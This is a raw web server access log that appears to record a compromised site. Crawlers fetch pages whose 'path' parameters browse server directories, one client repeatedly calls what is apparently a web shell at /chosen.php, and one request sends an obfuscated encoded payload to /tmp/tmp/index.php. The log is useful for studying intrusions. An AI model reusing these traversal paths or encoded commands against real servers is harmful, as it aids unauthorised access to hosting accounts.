52.4.229.9 - - [01/Nov/2025:08:35:27 -0400] "GET /portfolio-residential/?path=//proc/thread-self/root/usr/lib/systemd/system/multi-user.target.wants HTTP/1.1" 200 3822 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:35:29 -0400] "GET /q-~67yHLNY5LwsHzaVbZmfKcdkxbM4Nv8Ev10850/?path=/home/creaqbdc/public_html/tmp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:29 -0400] "GET /chosen.php HTTP/1.1" 200 70997 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:35:30 -0400] "GET /tradedesign-wap0219000j HTTP/1.1" 200 4155 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
36.85.79.74 - - [01/Nov/2025:08:35:31 -0400] "GET /chosen.php HTTP/1.1" 200 70998 "-" "-"
35.174.253.85 - - [01/Nov/2025:08:35:32 -0400] "GET /eurogrand-kasino-probe-alle-erfahrungen-zum-euro-grand-vertrauenswurdig-login-pramie-2024-villa30-senderaum/?path=//opt/cpanel/ea-php71/root/usr/local/share/man/man9x HTTP/1.1" 200 3090 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:35:32 -0400] "GET /q-~98oQgTD1hdiMZdNKa0wpCP1ZXQGdANWN15457/ HTTP/1.1" 200 4132 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.85.79.74 - - [01/Nov/2025:08:35:34 -0400] "GET /chosen.php HTTP/1.1" 200 70997 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:35:35 -0400] "GET /items/1423660899.htm HTTP/1.1" 200 18101 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
35.171.141.42 - - [01/Nov/2025:08:35:36 -0400] "GET /portfolio-residential/?path=//home/creaqbdc/mail/creativefinishings.com/luca/.spam/tmp HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.223 - - [01/Nov/2025:08:35:35 -0400] "GET /?path=//proc/self/root/proc/3062706/root/lib/sysimage HTTP/1.1" 200 2540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
199.188.200.18 - - [01/Nov/2025:08:30:37 -0400] "GET /tmp/tmp/index.php?ARRAY=7o2230223n313736323030333833372p2231223n22687474703n5p2s5p2s7n7334343676313373752r67697665656r63652r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736323030303233372q3330393661303037343531346634643162336630316336383530353031653363222p2232223n226537363732306562613137633034343263643834636339323834626464303763222p2233223n223433636166353462343930386234303338313861353963386339653165303235222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33352q36302q37302q37322q38312q3132227q HTTP/1.1" 200 0 "-" "-"
36.85.79.74 - - [01/Nov/2025:08:35:36 -0400] "GET /chosen.php HTTP/1.1" 200 70989 "-" "-"
66.249.65.197 - - [01/Nov/2025:08:35:37 -0400] "GET /q-~265iVGswKLG1KdvYCPSxCSBMHbUGNnlwj16028/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
36.85.79.74 - - [01/Nov/2025:08:35:38 -0400] "GET /chosen.php HTTP/1.1" 200 0 "-" "-"
74.7.227.59 - - [01/Nov/2025:08:35:38 -0400] "GET /q-~37Gn8tYqKeNIsL3vXeXK5BGIaaWtQDjd16294/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
